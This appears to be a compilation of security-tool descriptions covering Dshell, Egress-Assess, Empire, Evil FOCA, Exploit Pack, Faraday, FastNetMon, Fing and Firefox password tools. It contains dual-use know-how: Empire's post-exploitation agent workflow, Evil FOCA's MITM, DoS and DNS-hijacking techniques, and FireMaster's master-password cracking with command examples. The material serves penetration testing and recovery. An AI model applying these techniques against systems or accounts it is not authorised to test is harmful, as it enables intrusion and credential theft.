dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 30144 A? www.netbsd.org / A: 204.152.190.12 (ttl 82159s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 61652 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86400s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 32569 AAAA? www.netbsd.org / AAAA: 2001:4f8:4:7:2e0:81ff:fe52:9a6b (ttl 86340s) **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 36275 AAAA? www.google.com / CNAME: www.l.google.com **
dns 2005-03-30 03:47:46    192.168.170.8:32795 ->   192.168.170.20:53    ** 9837 AAAA? www.example.notginh / NXDOMAIN **
dns 2005-03-30 03:52:17    192.168.170.8:32796 <-   192.168.170.20:53    ** 23123 PTR? 127.0.0.1 / PTR: localhost **
dns 2005-03-30 03:52:25   192.168.170.56:1711  <-      217.13.4.24:53    ** 30307 A? GRIMM.utelsystems.local / NXDOMAIN **
dns 2005-03-30 03:52:17   192.168.170.56:1710  <-      217.13.4.24:53    ** 53344 A? GRIMM.utelsystems.local / NXDOMAIN **
Following and reassembling a stream in sample traffic
Dshell> decode -d followstream ~/pcap/v6-http.cap
Connection 1 (TCP)
Start: 2007-08-05 19:16:44.189852 UTC
  End: 2007-08-05 19:16:44.204687 UTC
2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 -> 2001:6f8:900:7c0::2:80 (240 bytes)
2001:6f8:900:7c0::2:80 -> 2001:6f8:102d:0:2d0:9ff:fee3:e8de:59201 (2259 bytes)

GET / HTTP/1.0
Host: cl-1985.ham-01.de.sixxs.net
Accept: text/html, text/plain, text/css, text/sgml, */*;q=0.01
Accept-Encoding: gzip, bzip2
Accept-Language: en
User-Agent: Lynx/2.8.6rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8b

HTTP/1.1 200 OK
Date: Sun, 05 Aug 2007 19:16:44 GMT
Server: Apache
Content-Length: 2121
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /</title>
 </head>
 <body>
<h1>Index of /</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>                    <a href="?C=M;O=A">Last modified</a>      <a href="?C=S;O=A">Size</a>  <a href="?C=D;O=A">Description</a><hr><img src="/icons/folder.gif" alt="[DIR]"> <a href="202-vorbereitung/">202-vorbereitung/</a>       06-Jul-2007 14:31    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="Efficient_Video_on_demand_over_Multicast.pdf">Efficient_Video_on_d..&gt;</a> 19-Dec-2006 03:17  291K  
<img src="/icons/unknown.gif" alt="[   ]"> <a href="Welcome%20Stranger!!!">Welcome Stranger!!!</a>     28-Dec-2006 03:46    0   
<img src="/icons/text.gif" alt="[TXT]"> <a href="barschel.htm">barschel.htm</a>            31-Jul-2007 02:21   44K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="bnd/">bnd/</a>                    30-Dec-2006 08:59    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="cia/">cia/</a>                    28-Jun-2007 00:04    -   
<img src="/icons/layout.gif" alt="[   ]"> <a href="cisco_ccna_640-801_command_reference_guide.pdf">cisco_ccna_640-801_c..&gt;</a> 28-Dec-2006 03:48  236K  
<img src="/icons/folder.gif" alt="[DIR]"> <a href="doc/">doc/</a>                    19-Sep-2006 01:43    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="freenetproto/">freenetproto/</a>           06-Dec-2006 09:00    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="korrupt/">korrupt/</a>                03-Jul-2007 11:57    -   
<img src="/icons/folder.gif" alt="[DIR]"> <a href="mp3_technosets/">mp3_technosets/</a>         04-Jul-2007 08:56    -   
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:27   31K  
<img src="/icons/text.gif" alt="[TXT]"> <a href="neues_von_rainald_goetz0.htm">neues_von_rainald_go..&gt;</a> 21-Mar-2007 23:29   36K  
<img src="/icons/layout.gif" alt="[   ]"> <a href="pruef.pdf">pruef.pdf</a>               28-Dec-2006 07:48   88K  
<hr></pre>
</body></html>
Chaining decoders to view flow data for a specific country code in sample traffic (note: TCP handshakes are not included in the packet count)
Dshell> decode -d country+netflow --country_code=JP ~/pcap/SkypeIRC.cap
2006-08-25 19:32:20.651502       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33436     1      0       36        0  0.0000s
2006-08-25 19:32:20.766761       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33438     1      0       36        0  0.0000s
2006-08-25 19:32:20.634046       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33435     1      0       36        0  0.0000s
2006-08-25 19:32:20.747503       192.168.1.2 ->  202.232.205.123  (-- -> JP)  UDP   60583   33437     1      0       36        0  0.0000s
Collecting netflow data for sample traffic with vlan headers, then tracking the connection to a specific IP address

Dshell> decode -d netflow ~/pcap/vlan.cap
1999-11-05 18:20:43.170500    131.151.20.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:42.063074     131.151.32.71 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.096540     131.151.1.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.079765     131.151.5.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:41.521798    131.151.104.96 ->  131.151.107.255  (US -> US)  UDP     137     137     3      0      150        0  1.5020s
1999-11-05 18:20:43.087010     131.151.6.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.368210   131.151.111.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.250410    131.151.32.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.115330    131.151.10.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.375145   131.151.115.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:43.363348   131.151.107.254 ->  255.255.255.255  (US -> --)  UDP     520     520     1      0       24        0  0.0000s
1999-11-05 18:20:40.112031      131.151.5.55 ->    131.151.5.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s
1999-11-05 18:20:43.183825     131.151.32.79 ->   131.151.32.255  (US -> US)  UDP     138     138     1      0      201        0  0.0000s


Download Dshell

Egress-Assess - Tool used to Test Egress Data Detection Capabilities


Egress-Assess is a tool used to test egress data detection capabilities.

Setup

To setup, run the included setup script, or perform the following:
  1. Install pyftpdlib
  2. Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:
"openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes"

Usage

Typical use case for Egress-Assess is to copy this tool in two locations. One location will act as the server, the other will act as the client. Egress-Assess can send data over FTP, HTTP, and HTTPS.
To extract data over FTP, you would first start Egress-Assess’s FTP server by selecting “--server ftp” and providing a username and password to use:
./Egress-Assess.py --server ftp --username testuser --password pass123
Now, to have the client connect and send data to the ftp server, you could run...
./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn
Also, you can setup Egress-Assess to act as a web server by running....
./Egress-Assess.py --server https
Then, to send data to the FTP server, and to specifically send 15 megs of credit card data, run the following command...
./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc


Download Egress-Assess

Empire - PowerShell Post-Exploitation Agent


Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Why PowerShell?

PowerShell offers a multitude of offensive advantages, including full .NET access, application whitelisting, direct access to the Win32 API, the ability to assemble malicious binaries in memory, and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014, but despite the multitude of useful projects, many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.

Initial Setup

Run the ./setup/install.sh script. This will install the few dependencies and run the ./setup/setup_database.py script. The setup_database.py file contains various setting that you can manually modify, and then initializes the ./data/empire.db backend database. No additional configuration should be needed- hopefully everything works out of the box.
Running ./empire will start Empire, and ./empire –debug will generate a verbose debug log at ./empire.debug. The included ./data/reset.sh will reset/reinitialize the database and launch Empire in debug mode.

Main Menu

Once you hit the main menu, you’ll see the number of active agents, listeners, and loaded modules.


The help command should work for all menus, and almost everything that can be tab-completable is (menu commands, agent names, local file paths where relevant, etc.).

You can ctrl+C to rage quit at any point. Starting Empire back up should preserve existing communicating agents, and any existing listeners will be restarted (as their config is stored in the sqlite backend database).

Listeners 101

The first thing you need to do it set up a local listener. The listeners command will jump you to the listener management menu. Any active listeners will be displayed, and this information can be redisplayed at any time with the list command. The info command will display the currently set listener options.


The info command will display the currently configured listener options. Set your host/port by doing something like set Host http://192.168.52.142:8081. This is tab-completable, and you can also use domain names here). The port will automatically be pulled out, and the backend will detect if you’re doing a HTTP or HTTPS listener. For HTTPS listeners, you must first set the CertPath to be a local .pem file. The provided ./data/cert.sh script will generate a self-signed cert and place it in ./data/empire.pem.

Set optional and WorkingHours, KillDate, DefaultDelay, and DefaultJitter for the listener, as well as whatever name you want it to be referred to as. You can then type execute to start the listener. If the name is already taken, a nameX variant will be used, and Empire will alert you if the port is already in use.

Stagers 101

The staging process and a complete description of the available stagers is detailed here and here.

Empire implements various stagers in a modular format in ./lib/stagers/*. These include dlls, macros, one-liners, and more. To use a stager, from the main, listeners, or agents menu, use usestager <tab> to tab-complete the set of available stagers, and you’ll be taken to the individual stager’s menu. The UI here functions similarly to the post module menu, i.e set/unset/info and generate to generate the particular output code.

For UserAgent and proxy options, default uses the system defaults, none clears that option from being used in the stager, and anything else is assumed to be a custom setting (note, this last bit isn’t properly implemented for proxy settings yet). From the Listeners menu, you can run the launcher [listener ID/name]alias to generate the stage0 launcher for a particular listener (this is the stagers/launcher module in the background). This command can be run from a command prompt on any machine to kick off the staging process. (NOTE: you will need to right click cmd.exe and choose “run as administrator” before pasting/running this command if you want to use modules that require administrative privileges). Our PowerShell version of BypassUAC module is in the works but not 100% complete yet.

Agents 101

You should see a status message when an agent checks in (i.e. [+] Initial agent CGUBKC1R3YLHZM4V from 192.168.52.168 now active). Jump to the Agents menu with agents. Basic information on active agents should be displayed. Various commands can be executed on specific agent IDs or all from the agent menu, i.e. kill all. To interact with an agent, use interact AGENT_NAME. Agent names should be tab-completable for all commands.


In an Agent menu, info will display more detailed agent information, and help will display all agent commands. If a typed command isn’t resolved, Empire will try to interpret it as a shell command (like ps). You can cd directories, upload/download files, and rename NEW_NAME.
For each registered agent, a ./downloads/AGENT_NAME/ folder is created (this folder is renamed with an agent rename). An ./agent.log is created here with timestamped commands/results for agent communication. Downloads/module outputs are broken out into relevant folders here as well.
When you’re finished with an agent, use exit from the Agent menu or kill NAME/all from the Agents menu. You’ll get a red notification when the agent exits, and the agent will be removed from the interactive list after.

Modules 101

To see available modules, type usemodule <tab>. To search module names/descriptions, use searchmodule privesc and matching module names/descriptions will be output.

To use a module, for example netview from PowerView, type usemodule situational_awareness/network/sharefinder and press enter. info will display all current module options.


To set an option, like the domain for sharefinder, use set Domain testlab.local. The Agent argument is always required, and should be auto-filled from jumping to a module from an agent menu. You can also set Agent <tab> to tab-complete an agent name. execute will task the agent to execute the module, and back will return you to the agent’s main menu. Results will be displayed as they come back.

Scripts

In addition to formalized modules, you are able to simply import and use a .ps1 script in your remote empire agent. Use the scriptimport ./path/ command to import the script. The script will be imported and any functions accessible to the script will now be tab completable using the “scriptcmd” command in the agent. This works well for very large scripts with lots of functions that you do not want to break into a module.


Download Empire

Evil FOCA - MITM, DoS, DNS Hijacking in IPv4 and IPv6 Penetration Testing Tool


Evil Foca is a tool for security pentesters and auditors whose purpose it is to test security in IPv4 and IPv6 data networks. The tool is capable of carrying out various attacks such as:
  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
  • DoS (Denial of Service) on IPv6 networks with SLAAC DoS.
  • DNS Hijacking.
The software automatically scans the networks and identifies all devices and their respective network interfaces, specifying their IPv4 and IPv6 addresses as well as the physical addresses through a convenient and intuitive interface.

Requirements

Man In The Middle (MITM) attack

The well-known “Man In The Middle” is an attack in which the wrongdoer creates the possibility of reading, adding, or modifying information that is located in a channel between two terminals with neither of these noticing. Within the MITM attacks in IPv4 and IPv6 Evil Foca considers the following techniques:
  • ARP Spoofing: Consists in sending ARP messages to the Ethernet network. Normally the objective is to associate the MAC address of the attacker with the IP of another device. Any traffic directed to the IP address of the predetermined link gate will be erroneously sent to the attacker instead of its real destination.
  • DHCP ACK Injection: Consists in an attacker monitoring the DHCP exchanges and, at some point during the communication, sending a packet to modify its behavior. Evil Foca converts the machine in a fake DHCP server on the network.
  • Neighbor Advertisement Spoofing: The principle of this attack is identical to that of ARP Spoofing, with the difference being in that IPv6 doesn’t work with the ARP protocol, but that all information is sent through ICMPv6 packets. There are five types of ICMPv6 packets used in the discovery protocol and Evil Foca generates this type of packets, placing itself between the gateway and victim.
  • SLAAC attack: The objective of this type of attack is to be able to execute an MITM when a user connects to Internet and to a server that does not include support for IPv6 and to which it is therefore necessary to connect using IPv4. This attack is possible due to the fact that Evil Foca undertakes domain name resolution once it is in the communication media, and is capable of transforming IPv4 addresses in IPv6.
  • Fake DHCPv6 server: This attack involves the attacker posing as the DCHPv6 server, responding to all network requests, distributing IPv6 addresses and a false DNS to manipulate the user destination or deny the service.
  • Denial of Service (DoS) attack: The DoS attack is an attack to a system of machines or network that results in a service or resource being inaccessible for its users. Normally it provokes the loss of network connectivity due to consumption of the bandwidth of the victim’s network, or overloads the computing resources of the victim’s system.
  • DoS attack in IPv4 with ARP Spoofing: This type of DoS attack consists in associating a nonexistent MAC address in a victim’s ARP table. This results in rendering the machine whose ARP table has been modified incapable of connecting to the IP address associated to the nonexistent MAC.
  • DoS attack in IPv6 with SLAAC attack: In this type of attack a large quantity of “router advertisement” packets are generated, destined to one or several machines, announcing false routers and assigning a different IPv6 address and link gate for each router, collapsing the system and making machines unresponsive.
  • DNS Hijacking: The DNS Hijacking attack or DNS kidnapping consists in altering the resolution of the domain names system (DNS). This can be achieved using malware that invalidates the configuration of a TCP/IP machine so that it points to a pirate DNS server under the attacker’s control, or by way of an MITM attack, with the attacker being the party who receives the DNS requests, and responding himself or herself to a specific DNS request to direct the victim toward a specific destination selected by the attacker.


Download Evil FOCA

Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development


Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc. Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved into the next project decisions, everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real environment attacks into real corporate clients.

Video demonstration of the latest Exploit Pack release:


More than 300+ exploits

Military grade professional security tool

Exploit Pack comes into the scene when you need to execute a pentest in a real environment, it will provide you with all the tools needed to gain access and persist by the use of remote reverse agents.

Remote Persistent Agents

Reverse a shell and escalate privileges

Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shellcodes directly into the agent.

Write your own Exploits

Use Exploit Pack as a learning platform

Quick exploit development, extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python Editor moded to fullfill the needs of an Exploit Writer.


Download Exploit Pack

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform


A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with new exciting features.

As a part of our constant commitment to the IT sec community we added a tool that runs several other tools to all IPs in a given list. This results in a major scan to your infrastructure which can be done as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search



* Updates version number on Faraday Start
* Added Services columns to Status Report


* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install
* Saving objects without parent
* Visual fixes on Firefox


Download Faraday 1.0.15

Faraday 1.0.16 - Collaborative Penetration Test and Vulnerability Management Platform


Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.

This version comes with major changes to our Web UI, including the possibility to mark vulnerabilities as false positives. If you have a Pro or Corp license you can now create an Executive Report using only confirmed vulnerabilities, saving you even more time.

A brand new feature that comes with v1.0.16 is the ability to group vulnerabilities by any field in our Status Report view. Combine it with bulk edit to manage your findings faster than ever!

This release also features several new features developed entirely by our community. 


Changes:


* Added group vulnerabilities by any field in our Status Report



* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report (Pro&Corp)

Filter in Status Report view
* Added Wiki information about running Faraday without configuring CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
         - get all IPs from targets that have no services (/bin/getAllIpsNotServices.py)

/bin/getAllIpsNotServices.py
    - get all IP addresses that have defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
            It's important to note that both these scripts hold a variable that you can modify to alter its behaviour. /bin/getAllbySrv.py has a port variable set to 8080 by default. /bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
    - Immunity Canvas

Canvas configuration

    - Dig
    - Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under $HOME/.faraday/data. Affected Plugins:
    - amap
    - dnsmap
    - nmap
    - sslcheck
    - wcscan
    - webfuzzer
    - nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors


Download Faraday 1.0.16

Faraday v1.0.7 - Integrated Penetration-Test Environment a multiuser Penetration test IDE



Faraday introduces a new concept (IPE) Integrated Penetration-Test Environment a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.

The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

Designed for simplicity, users should notice no difference between their own terminal application and the one included in Faraday. Developed with a specialized set of functionalities that help users improve their own work. Do you remember yourself programming without an IDE? Well, Faraday does the same as an IDE does for you when programming, but from the perspective of a penetration test.

Changes made to the UX/UI:
  • Improved Vulnerability Edition usability, selecting a vulnerability will load it's content automatically.
  • ZSH UI now is showing notifications.
  • ZSH UI displays active workspaces.
  • Faraday now asks confirmation when exiting out. If you have pending conflicts to resolve it will show the number for each one.
  • Vulnerability creation is now supported in the status report.
  • Introducing SSLCheck, a tool for verifying bugs in SSL/TLS Certificates on remote hosts. This is integrated with Faraday as a plugin.
  • Shodan Plugin is now working with the new API.
  • Some cosmetic changes for the status report.
Bugfixes:
  • Sorting columns in the Status Report is running smoothly.
  • The Workspace icon is now based on the type of workspace being used.
  • Opening the reports in QT UI opens the active workspace.
  • UI Web dates fixes, we were showing dates with a off-by-one error.
  • Vulnerability edition was missing 'critical' severity.
  • Objects merge bugfixing
  • Metadata recursive save fix

Download Faraday

FastNetMon - Very Fast DDoS Analyzer with Sflow/Netflow/Mirror Support


A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines (NetFlow, IPFIX, sFLOW, netmap, PF_RING, PCAP).

What can we do? We can detect hosts in our own network with a large amount of packets per second/bytes per second or flow per second incoming or outgoing from certain hosts. And we can call an external script which can notify you, switch off a server or blackhole the client.

Features:
  • Can process incoming and outgoing traffic
  • Can trigger block script if certain IP loads network with a large amount of packets/bytes/flows per second
  • Could announce blocked IPs to BGP router with ExaBGP
  • Have integration with Graphite
  • netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
  • Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
  • Can work on server/soft-router
  • Can detect DoS/DDoS in 1-2 seconds
  • Tested up to 10GE with 5-6 Mpps on Intel i7 2600 with Intel Nic 82599
  • Complete plugin support
  • Have complete support for most popular attack types

Supported platforms:
  • Linux (Debian 6/7/8, CentOS 6/7, Ubuntu 12+)
  • FreeBSD 9, 10, 11
  • Mac OS X Yosemite
What is "flow" in FastNetMon terms? It's one or multiple udp, tcp, icmp connections with unique src IP, dst IP, src port, dst port and protocol.

Example for cpu load on Intel i7 2600 with Intel X540/82599 NIC on 400 kpps load:


To enable sFLOW simply specify IP of server with installed FastNetMon and specify port 6343. To enable netflow simply specify IP of server with installed FastNetMon and specify port 2055.
Why did we write this? Because we can't find any software for solving this problem in the open source world!


Download FastNetMon

Fing - Find out Which Devices are Connected to your Wi-Fi Network


Find out which devices are connected to your Wi-Fi network, in just a few seconds.

Fast and accurate, Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues.
  • Discovers all devices connected to a Wi-Fi network. Unlimited devices and unlimited networks, for free! 
  • Displays MAC Address and device manufacturer.
  • Enter your own names, icons, notes and location
  • Full search by IP, MAC, Name, Vendor and Notes 
  • History of all discovered networks. 
  • Share via Twitter, Facebook, Message and E-mail
  • Service Scan: Find hundreds of open ports in a few seconds.
  • Wake On LAN: Switch on your devices from your mobile or tablet! 
  • Ping and traceroute: Understand your network performances.
  • Automatic DNS lookup and reverse lookup
  • Checks the availability of Internet connection
  • Works also with hosts outside your local network 
  • Tracks when a device has gone online or offline
  • Launch Apps for specific ports, such as Browser, SSH, FTP 
  • Displays NetBIOS names and properties
  • Displays Bonjour info and properties
  • Supports identification by IP address for bridged networks
  • Sort by IP, MAC, Name, Vendor, State, Last Change. 
  • Free of charge, no banner Ads 
  • Available for iPhone, iPad and iPod Touch with retina and standard displays.
  • Integrates with Fingbox to sync and backup your customizations, merge networks with multiple access points, monitor remote networks via Fingbox Sentinels, get notifications of changes, and much more. 
  • Fing is available on several other platforms, including Windows, OS X and Linux. Check them out!

Download Fing

Firefox Autocomplete Spy - Tool to View or Delete Autofill Data from Mozilla Firefox


Firefox Autocomplete Spy is the free tool to easily view and delete all your autocomplete data from Firefox browser.

Firefox stores Autocomplete entries (typically form fields) such as login name, email, address, phone, credit/debit card number, search history etc in an internal database file.

'Firefox Autocomplete Spy' helps you to automatically find and view all the Autocomplete history data from Firefox profile location. For each of the entry, it display following details,
  • Field Name
  • Value
  • Total Used Count
  • First Used Date
  • Last Used Date

You can also use it to view from history file belonging to another user on same or remote system. It also provides one click solution to delete all the displayed Autocomplete data from the history file.

It is very simple to use for everyone, especially makes it handy tool for Forensic investigators.

Firefox Autocomplete Spy is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features
  • Instantly view all the autocomplete data from Firefox form history file
  • On startup, it auto detects Autocomplete file from default profile location
  • Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
  • Delete all the Autocomplete data with just a click of button
  • Save the displayed autocomplete list to HTML/XML/TEXT/CSV file
  • Easier and faster to use with its enhanced user friendly GUI interface
  • Fully Portable, does not require any third party components like JAVA, .NET etc
  • Support for local Installation and uninstallation of the software

How to Use

Firefox Autocomplete Spy is easy to use with its simple GUI interface.

Here are the brief usage details
  • Launch FirefoxAutocompleteSpy on your system
  • By default it will automatically find and display the autocomplete file from default profile location. You can also select the desired file manually.
  • Next click on 'Show All' button and all stored Autocomplete data will be displayed in the list as shown in screenshot 1 below.
  • If you want to remove all the entries, click on 'Delete All' button below.
  • Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.


Download Firefox Autocomplete Spy

FireMaster - The Firefox Master Password Cracking Tool


FireMaster is the First ever tool to recover the lost Master Password of Firefox.

Master password is used by Firefox to protect the stored loign/password information for all visited websites. If the master password is forgotten, then there is no way to recover the master password and user will lose all the passwords stored in it.

However you can now use FireMaster to recover the forgotten master password and get back all the stored Login/Passwords.

FireMaster supports Dictionary, Hybrid, Brute-force and advanced Pattern based Brute-force password cracking techniques to recover from simple to complex password. Advanced pattern based password recovery mechanism reduces cracking time significantly especially when the password is complex.

FireMaster is successfully tested with all versions of Firefox starting from 1.0 to latest version v13.0.1.

It works on wide range of platforms starting from Windows XP to Windows 8.

Firefox Password Manager and Master Password

Firefox comes with built-in password manager tool which remembers username and passwords for all the websites you visit. This login/password information is stored in the encrypted form in Firefox database files residing in user's profile directory.
However any body can just launch the password manager from the Firefox browser and view the credentials. Also one can just copy these database files to different machine and view it offline using the tools such as FirePassword.

Hence to protect from such threats, Firefox uses master password to provide enhanced security. By default Firefox does not set the master password. However once you have set the master password, you need to provide it every time to view login credentials. So if you lose the master password then that means you have lost all the stored passwords as well.

So far there was no way to recover these credentials once you have lost the master password. Now the FireMaster can help you to recover the master password and get back all the sign-on information.

Internals of FireMaster

Once you have lost master password, there is no way to recover it as it is not stored at all.
Whenever user enters the master password, Firefox uses it to decrypt the encrypted data associated with the known string. If the decrypted data matches this known string then the entered password is correct. FireMaster uses the similar technique to check for the master password, but in more optimized way.
The entire operation goes like this.
  • FireMaster generates passwords on the fly through various methods.
  • Then it computes the hash of the password using known algorithm.
  • Next this password hash is used to decrypt the encrypted data for known plain text (i.e. "password-check").
  • Now if the decrypted string matches with the known plain text (i.e. "password-check") then the generated password is the master password.

Firefox stores the details about encrypted string, salt, algorithm and version information in key database file key3.db in the user's profile directory. You can just copy this key3.db file to different directory and specify the corresponding path to FireMaster. You can also copy this key3.db to any other high end machine for faster recovery operation.

FireMaster supports following password recovery methods

1) Dictionary Cracking Method
In this mode, FireMaster uses dictionary file having each word on separate line to perform the operation. You can find lot of online dictionary with different sizes and pass it on to Firemaster. This method is more quicker and can find out common passwords.

2) Hybrid Cracking Method
This is advanced dictionary method, in which each word in the dictionary file is prefixed or suffixed with generated word from known character list. This can find out password like pass123, 12test, test34 etc. From the specified character list (such as 123), all combinations of strings are generated and appended or prefixed to the dictionary word based on user settings.

3) Brute-force Cracking Method
In this method, all possible combinations of words from given character list is generated and then subjected to cracking process. This may take long time depending upon the number of characters and position count specified. 

4) Pattern based Brute-force Cracking Method
Pattern based cracking method significantly reduces the password recovery time especially when password is complex. This method can be used when you know the exact password length and remember few characters.

How to use FireMaster?

First you need to copy the key3.db file to temporary directory. Later you have to specify this directory path for FireMaster as a last argument.

Here is the general usage information

Firemaster [-q]
           [-d -f ]
           [-h -f  -n  -g "charlist" [ -s | -p ] ]
           [-b -m  -l  -c "charlist" -p "pattern" ]
           

Note: With v5.0 onwards, you can specify 'auto' (without quotes) in place of "" to automatically detect default profile path.
 
Dictionary Crack Options:
   -d  Perform dictionary crack
   -f  Dictionary file with words on each line
    
Hybrid Crack Options:
   -h  Perform hybrid crack operation using dictionary passwords.
Hybrid crack can find passwords like pass123, 123pass etc
   -f  Dictionary file with words on each line
   -g  Group of characters used for generating the strings
   -n  Maximum length of strings to be generated using above character list
These strings are added to the dictionary word to form the password
   -s  Suffix the generated characters to the dictionary word(pass123)
   -p  Prefix the generated characters to the dictionary word(123pass)
    
Brute Force Crack Options:
   -b  Perform brute force crack
   -c  Character list used for brute force cracking process
   -m  [Optional] Specify the minimum length of password
   -l  Specify the maximum length of password
   -p   [Optional] Specify the pattern for the password

Examples of FireMaster
// Dictionary Crack
FireMaster.exe -d -f c:\dictfile.txt auto
 
// Hybrid Crack
FireMaster.exe -h -f c:\dictfile.txt -n 3 -g "123" -s auto
 
 // Brute-force Crack
FireMaster.exe -q -b -m 3 -l 10 -c "abcdetps123" "c:\my test\firefox"
 
 // Brute-force Crack with Pattern
FireMaster.exe -q -b -m 3 -c "abyz126" -l 10 -p "pa??f??123" auto


Download FireMaster

FireMasterCracker - Firefox Master Password Cracking Software



Firefox browser uses Master password to protect the stored login passwords for all visited websites. If the master password is forgotten, then there is no way to recover the Master Password and user will also lose all the webiste login passwords.

In such cases, FireMasterCracker can help you to recover the lost Master Password. It uses dictionary based password cracking method. You can find good collection of password dictionaries (also called wordlist).

Though it supports only Dictinary Crack method, you can easily use tools like Crunch, Cupp to generate brute-force based or any custom password list file and then use it with FireMasterCracker.

It is very easy to use with its cool & simple interface. It is designed to make it very simpler and quicker for users who find it difficult to use command-line based FireMaster.


FireMasterCracker works on wide range of platforms starting from Windows XP to Windows 8.

Features

Here are prime features of FireMasterCracker
  • Free & Easiest tool to recover the Firefox Master Password
  • Supports Dictionary based Password Recovery method
  • Automatically detects the current Firefox profile location
  • Displays detailed statistics during Cracking operation
  • Stop the password cracking operation any time.
  • Easy to use with cool graphics interface.
  • Generate Password Recovery report in HTML/XML/TEXT format.
